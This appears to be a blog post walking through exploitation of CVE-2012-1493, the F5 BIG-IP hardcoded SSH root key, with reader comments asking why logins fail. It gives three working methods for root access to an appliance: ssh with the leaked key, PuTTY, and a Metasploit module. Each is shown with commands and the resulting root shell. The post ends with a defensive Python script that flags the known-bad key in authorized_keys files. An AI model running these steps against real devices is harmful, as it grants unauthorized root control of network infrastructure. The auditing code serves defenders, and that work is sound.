# Exploiting F5 BIG-IP SSH vulnerability

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1493
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

Option 1: Command-line

# cat f5_private_key 
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
# chmod 0600 f5_private_key
# ssh -i f5_private_key root@192.168.1.1
[root@F5-BIG-IP:Active] config # bigpipe platform | grep Platform
|     BIOS revision: F5 Platform: C103 OBJ-0335-01 BIOS (build: 130) Date: 09/12/09
[root@F5-BIG-IP:Active] config # bigpipe version | grep Version
BIG-IP Version 10.2.2 969.0
[root@F5-BIG-IP:Active] config # whoami
root

Option 2: PuTTY

- Use PuTTYGen to obtain a private ppk file from f5_private_key
- Execute PuTTY
- Connection/SSH/Auth/Private key file for authentication/Browse...: C:\f5_private_key.ppk
- Session/Host Name (or IP address) and Port: 192.168.1.1:22
- Open

login as: root
Authenticating with public key "imported-openssh-key"
[root@F5-BIG-IP:Active] config # whoami
root

Option 3: Metasploit

# msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf  exploit(f5_bigip_known_privkey) > show payloads
msf  exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf  exploit(f5_bigip_known_privkey) > set lhost 192.168.1.2
msf  exploit(f5_bigip_known_privkey) > set rhost 192.168.1.1
msf  exploit(f5_bigip_known_privkey) > exploit

[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:42298 -> 192.168.1.1:22)

whoami
root
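
From the defender's side, the logins above succeed because the appliance accepts a key whose private half is public, so the useful check is whether any active `authorized_keys` entry matches a known-bad fingerprint. The following is an added example, not part of the original post: it parses `authorized_keys` text (including entries with an options field) and reports denylisted keys by OpenSSH-style SHA256 fingerprint. The sample keys and the `KNOWN_BAD` value are constructed placeholders; the real fingerprint is not given on this page and must come from the vendor advisory.

```python
import base64
import hashlib
import struct

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a raw public key blob."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

def parse_entry(line):
    """Return (keytype, blob, comment) for an active authorized_keys line, else None."""
    tokens = line.split()
    if not tokens or tokens[0].startswith("#"):   # blank or commented-out entry
        return None
    for i, tok in enumerate(tokens[:-1]):
        if tok not in KEY_TYPES:
            continue
        try:
            blob = base64.b64decode(tokens[i + 1], validate=True)
        except ValueError:                        # next token is not base64
            continue
        # A key blob starts with its own length-prefixed type name; checking it
        # avoids mistaking text inside an options field for the key itself.
        name = tok.encode()
        if blob.startswith(struct.pack(">I", len(name)) + name):
            return tok, blob, " ".join(tokens[i + 2:])
    return None

def audit(text, known_bad):
    """List (line number, fingerprint, comment) for entries on the denylist."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = parse_entry(line)
        if entry and fingerprint(entry[1]) in known_bad:
            hits.append((n, fingerprint(entry[1]), entry[2]))
    return hits

def demo_key(seed):
    """Constructed stand-in blob (not a real key): type name plus filler bytes."""
    blob = struct.pack(">I", 7) + b"ssh-rsa" + hashlib.sha256(seed).digest()
    return base64.b64encode(blob).decode()

# Constructed authorized_keys content; the second entry carries an options field.
SAMPLE = "\n".join([
    "ssh-rsa %s admin@example" % demo_key(b"admin"),
    'command="echo ssh-rsa x",no-pty ssh-rsa %s vendor-support' % demo_key(b"vendor"),
])
KNOWN_BAD = {fingerprint(base64.b64decode(demo_key(b"vendor")))}  # placeholder value
```

`audit(SAMPLE, KNOWN_BAD)` reports only the second line; in practice, pass it the contents of each account's `authorized_keys` file and the fingerprint published by the vendor.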

2 comments:

Anonymous said...

I followed your steps, but I get an error:
SSH - Failed authentication

Do you know what the mistake is?
Thanks...

Anonymous said...

Tried the 1st and 3rd options but was unable to log in.
Again it's asking for credentials...
Any idea how to resolve this to get access using the privkey?